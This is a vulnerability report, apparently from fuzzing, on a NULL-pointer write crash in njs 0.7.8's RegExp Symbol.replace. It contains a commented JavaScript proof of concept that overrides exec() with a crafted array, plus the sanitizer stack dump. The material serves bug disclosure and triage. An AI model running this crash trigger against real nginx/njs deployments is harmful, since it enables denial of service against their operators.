SEGV njs_regexp.c:1397:28 in njs_regexp_prototype_symbol_replace
Environment
Commit : https://github.com/nginx/njs/commit/95425b271ad27470ea39d6c91ca4a614690ab12b
Version : 0.7.8
Build : ./configure --cc=clang --address-sanitizer=YES && make
(The report below is emitted by the UndefinedBehaviorSanitizer runtime, so this configuration presumably enables UBSan alongside ASan. The failure itself is a plain SEGV on a write to the NULL page rather than a sanitizer-detected error, so it should also reproduce on an uninstrumented build — worth confirming when triaging.)
POC (save to a file and run it with the sanitizer build's `build/njs` binary; the `njs_process_file` frame in the stack dump shows that is how the crash was reached)
// Fuzzer-reduced reproducer (fuzzilli-style names v1, v3, ...). Statement
// order matters: the array's index layout and the exec() override are what
// drive njs_regexp_prototype_symbol_replace into the fault reported below,
// so keep the sequence intact when minimising further.
function main() {
// The "match result" that the overridden exec() will hand back.
const v1 = [];
// Accessor descriptors whose getter/setter is the Object constructor:
// reading such an element calls Object() with no arguments and yields a
// fresh {} rather than a string.
const v3 = {"get":Object};
const v6 = {"get":Object,"set":Object};
// Accessor element at a huge index. Per spec this grows v1.length to
// 413211586, so the result array looks like it carries ~4.1e8 capture
// groups. A spec-faithful engine walking every index is merely slow here;
// njs faults instead (see the stack dump).
const v7 = Object.defineProperty(v1,413211585,v6);
// "number".__proto__ is String.prototype; join() stringifies it to "" and
// v10 is empty, so v11 is "". Looks like a fuzzer leftover with no bearing
// on the crash -- TODO confirm by dropping it before treating it as required.
const v9 = "number".__proto__;
const v10 = [];
const v11 = v10.join(v9);
// Second accessor element at a small index; everything between index 6
// and 413211585 is a hole.
const v12 = Object.defineProperty(v1,"6",v3);
// No 'g' flag, so Symbol.replace performs a single exec() call.
const v13 = /\d?/myi;
// Custom exec: ignores its arguments and returns the crafted array, which
// RegExp.prototype[Symbol.replace] then treats as the match result.
function v15(v16,v17,v18,v19) {
return v1;
}
v13["exec"] = v15;
// String.prototype.replace dispatches to v13[Symbol.replace] with
// replaceValue undefined; the njs_string_prototype_replace ->
// njs_regexp_prototype_symbol_replace path is where the SEGV (a write to
// the NULL page) is reported.
const v21 = "replace"["replace"](v13);
}
// Under the sanitizer build reported above this call does not return: the
// process dies with the SEGV in the stack dump.
main();
Stack dump (frames #0–#5 show the fault is reached from String.prototype.replace through the native RegExp Symbol.replace implementation). The faulting address is 0x0 and the access is a write, which points at an unchecked NULL — presumably a missed allocation-failure or error-return check around njs_regexp.c:1397 — rather than at a controllable corruption primitive; the practical impact is a crash of the process executing the script (an nginx worker when njs is embedded), which still matters because the trigger is plain script input.
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==3789694==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000473990 bp 0x7ffc1c8a6590 sp 0x7ffc1c8a6430 T3789694)
==3789694==The signal is caused by a WRITE memory access.
==3789694==Hint: address points to the zero page.
#0 0x473990 in njs_regexp_prototype_symbol_replace /home/user/fuzzilli_njs/njs/njs/src/njs_regexp.c:1397:28
#1 0x46e734 in njs_function_native_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:747:11
#2 0x46db98 in njs_function_frame_invoke /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:793:16
#3 0x46db98 in njs_function_call2 /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:597:11
#4 0x45420e in njs_function_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.h:181:12
#5 0x45420e in njs_string_prototype_replace /home/user/fuzzilli_njs/njs/njs/src/njs_string.c:3729:20
#6 0x46e734 in njs_function_native_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:747:11
#7 0x46dc7f in njs_function_frame_invoke /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:793:16
#8 0x43a61e in njs_vmcode_interpreter /home/user/fuzzilli_njs/njs/njs/src/njs_vmcode.c:854:23
#9 0x46e221 in njs_function_lambda_call /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:698:11
#10 0x46dcb0 in njs_function_frame_invoke /home/user/fuzzilli_njs/njs/njs/src/njs_function.c:796:16
#11 0x43a61e in njs_vmcode_interpreter /home/user/fuzzilli_njs/njs/njs/src/njs_vmcode.c:854:23
#12 0x437917 in njs_vm_start /home/user/fuzzilli_njs/njs/njs/src/njs_vm.c:544:11
#13 0x42ce32 in njs_process_script /home/user/fuzzilli_njs/njs/njs/src/njs_shell.c:1070:19
#14 0x42d62c in njs_process_file /home/user/fuzzilli_njs/njs/njs/src/njs_shell.c:799:11
#15 0x42cabb in main /home/user/fuzzilli_njs/njs/njs/src/njs_shell.c:461:15
#16 0x7f1594b5b082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#17 0x406ded in _start (/home/user/fuzzilli_njs/njs/njs/build/njs+0x406ded)
UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV /home/user/fuzzilli_njs/njs/njs/src/njs_regexp.c:1397:28 in njs_regexp_prototype_symbol_replace